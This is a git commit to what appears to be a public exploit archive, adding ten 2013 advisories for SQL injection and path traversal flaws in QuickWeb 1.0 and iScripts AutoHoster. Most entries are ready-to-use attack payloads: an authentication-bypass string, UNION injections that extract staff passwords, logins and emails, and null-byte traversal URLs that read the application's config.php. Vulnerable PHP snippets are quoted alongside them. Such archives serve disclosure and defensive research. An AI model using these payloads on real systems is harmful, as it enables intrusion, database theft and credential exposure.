DB: 2015-12-08

10 new exploits
2015-12-08 05:03:12 +00:00 · 2015-12-08 05:03:12 +00:00 · cc3cd3f120
commit cc3cd3f120
parent 04598bf305
11 changed files with 124 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35147,3 +35147,13 @@ id,file,description,date,author,platform,type,port
 38880,platforms/php/webapps/38880.txt,"Veno File Manager 'q' Parameter Arbitrary File Download Vulnerability",2013-12-11,"Daniel Godoy",php,webapps,0
 38881,platforms/php/webapps/38881.html,"Piwigo admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0
 38882,platforms/cgi/webapps/38882.txt,"Icinga cgi/config.c process_cgivars Function Off-by-one Read Remote DoS",2013-12-16,"DTAG Group Information Security",cgi,webapps,0
+38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0
+38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 login.asp Multiple Field SQL Injection Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0
+38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster /checktransferstatus.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster /checktransferstatusbck.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster /additionalsettings.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster /payinvoiceothers.php invno Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster /support/parser/main_smtp.php Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0
+38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster /admin/downloadfile.php fname Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
--- a/platforms/asp/webapps/38883.txt
+++ b/platforms/asp/webapps/38883.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64371/info
+
+EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/dweb/apps/news-events/newdetail.asp?id=1=[SQL INJECTION] 
--- a/platforms/asp/webapps/38884.txt
+++ b/platforms/asp/webapps/38884.txt
@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/64371/info
+ 
+EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+ 
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+ 
+EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected.
+
+www.example.com/dweb/login.asp
+
+UserID : x' or ' 1=1--
+Password : x' or ' 1=1-- 
--- a/platforms/php/webapps/38885.txt
+++ b/platforms/php/webapps/38885.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/64377/info
+
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks. 
+
+/checktransferstatus.php
+Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=database()limit 53,1),0x723078 and 'faris'='1337
+Staff number : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from autohoster_staffs),0x723078 and 'faris'='1337
+Staff Data : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337
--- a/platforms/php/webapps/38886.txt
+++ b/platforms/php/webapps/38886.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/64377/info
+ 
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+ 
+/checktransferstatusbck.php
+Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=database()limit 53,1),0x723078 and 'faris'='1337
+Staff number : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,count(*),0x3c3c) from autohoster_staffs),0x723078 and 'faris'='1337
+Staff Data : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select concat(0x3e3e,unhex(Hex(cast(vPassword as char))),0x5e,unhex(Hex(cast(vLogin as char))),0x5e,unhex(Hex(cast(vMail as char))),0x3c3c) from autohoster_staffs limit 0,1) ,0x723078 and 'faris'='1337
--- a/platforms/php/webapps/38887.txt
+++ b/platforms/php/webapps/38887.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64377/info
+  
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+  
+Time based Blind Injection
+/additionalsettings.php
+Post : submit=faris&cmbdomain=%Inject_Here%
--- a/platforms/php/webapps/38888.txt
+++ b/platforms/php/webapps/38888.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/64377/info
+   
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+   
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+   
+/payinvoiceothers.php
+invno=%Inject_Here%
--- a/platforms/php/webapps/38889.txt
+++ b/platforms/php/webapps/38889.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64377/info
+    
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+    
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+    
+/support/parser/main_smtp.php
+^
+Just light sandwitch before the fatty food :))
--- a/platforms/php/webapps/38890.txt
+++ b/platforms/php/webapps/38890.txt
@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/64377/info
+     
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+     
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+     
+/websitebuilder/showtemplateimage.php
+include_once "includes/session.php";
+include_once "includes/function.php";
+$templateid    = $_GET['tmpid'];
+$type      = $_GET['type'];
+if ($type == "home") {
+  $imagename  = "homepageimage.jpg";
+} else if($type == "sub") {
+  $imagename  = "subpageimage.jpg";
+} else {
+  $imagename  = "thumpnail.jpg";
+}
+readfile("./".$_SESSION["session_template_dir"]."/".$templateid."/$imagename");
+Hmmm , we can cancel the imagename value via the null byte %00
+[+] Exploit : /websitebuilder/showtemplateimage.php?tmpid=../../includes/config.php%00&type=sub
--- a/platforms/php/webapps/38891.txt
+++ b/platforms/php/webapps/38891.txt
@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/64377/info
+      
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+      
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+      
+/admin/downloadfile.php > probably injected by the Guy who nulled the script (thank u any way ;p)
+$filename  = urldecode($_GET['fname']);
+header("content-disposition:attachment;filename=$filename");
+readfile($filename)
+no need to cancel any thing , just beat it bro ;)
+[+] Exploit : /admin/downloadfile.php?fname=../includes/config.php
--- a/platforms/php/webapps/38892.txt
+++ b/platforms/php/webapps/38892.txt
@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/64377/info
+       
+iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+       
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
+       
+/support/admin/csvdownload.php
+  $filename="../csvfiles/".addslashes($_GET["id"]).".txt";
+  header('Content-Description: File Transfer'); 
+  header('Content-Type: application/force-download'); 
+  header('Content-Length: ' . filesize($filename)); 
+  header('Content-Disposition: attachment; filename=' . basename($filename)); 
+  readfile($filename);
+[+] Exploit : /support/admin/csvdownload.php?id=../../includes/config.php%00